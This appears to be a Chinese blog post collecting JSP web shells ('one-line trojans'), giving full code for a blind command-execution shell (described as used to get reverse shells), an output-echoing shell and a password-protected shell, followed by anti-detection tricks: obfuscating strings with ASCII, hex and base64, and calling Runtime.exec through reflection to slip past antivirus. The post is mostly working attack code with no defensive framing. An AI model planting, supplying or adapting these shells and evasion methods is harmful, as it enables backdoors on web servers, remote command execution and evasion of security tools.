JSP木马整理

一、无回显一句话木马

http://localhost/index.jsp?cmd=whoami
不会回显执行的结果只能在后台打印一个地址,常用来反弹shell

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<html>
<head>
    <title>一句话木马</title>
</head>
<body>
<%
  Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
  System.out.println(process);
%>
</body>
</html>

二、有回显一句话木马

<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.BufferedReader" %>
<%@ page import="java.io.InputStreamReader" %>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<html>
<head>
    <title>一句话木马</title>
</head>
<body>
<%
  Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
  InputStream inputStream = process.getInputStream();
  BufferedReader bufferedReader =  new BufferedReader(new InputStreamReader(inputStream));
  String line;
  while ((line = bufferedReader.readLine())!=null){
     response.getWriter().print(line);
    }
%>
</body>
</html>

 

三、有密码的回显一句话木马

<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.BufferedReader" %>
<%@ page import="java.io.InputStreamReader" %>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<html>
<head>
    <title>一句话木马</title>
</head>
<body>
<%
  if ("password".equals(request.getParameter("p"))){
  Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
    InputStream inputStream = process.getInputStream();
    BufferedReader bufferedReader =  new BufferedReader(new InputStreamReader(inputStream));
    String line;
    while ((line = bufferedReader.readLine())!=null){
        response.getWriter().print(line);
    }
  }
%>
</body>
</html>

 

四、免杀绕过

(一)JSP中的字符串混淆方式

package com.eleven.test;
import sun.misc.BASE64Decoder;
import javax.xml.bind.DatatypeConverter;
import java.io.IOException;
public class JspEncode {
    public static void main(String[] args) throws IOException {
        String a = new String(new byte[] {121,122,100,100,77,114,54});
        System.out.println("ASCII: "+a);
        String b = new String(DatatypeConverter.parseHexBinary("797a64644d7236"));
        System.out.println("HEX: "+ b);
        String c = new String(new BASE64Decoder().decodeBuffer("eXpkZE1yNg=="));
        System.out.println("BASE64: "+c);
    }
}

(二)类反射绕过

package com.eleven.test;

import java.lang.reflect.Method;
import java.util.Scanner;

public class Test {
    public static void main(String[] args) throws Exception {
        String op = "";
        Class rt = Class.forName("java.lang.Runtime"); //加载Runtime类
        Method gr = rt.getMethod("getRuntime");  //获取getRuntime方法
        Method ex = rt.getMethod("exec", String.class);  //获取exec方法
        Process e = (Process) ex.invoke(gr.invoke(null),  "cmd /c whoami"); //invoke 传参调用
        //以下代码是获取输出结果
        Scanner sc = new Scanner(e.getInputStream()).useDelimiter("\\A");
        op = sc.hasNext() ? sc.next() : op;
        sc.close();
        System.out.print(op);
    }

}

那么接下来就是把他放到jsp里面。

利用base64编码

 

posted @ 2023-04-10 05:47  Eleven_Liu  阅读(3224)  评论(1编辑  收藏  举报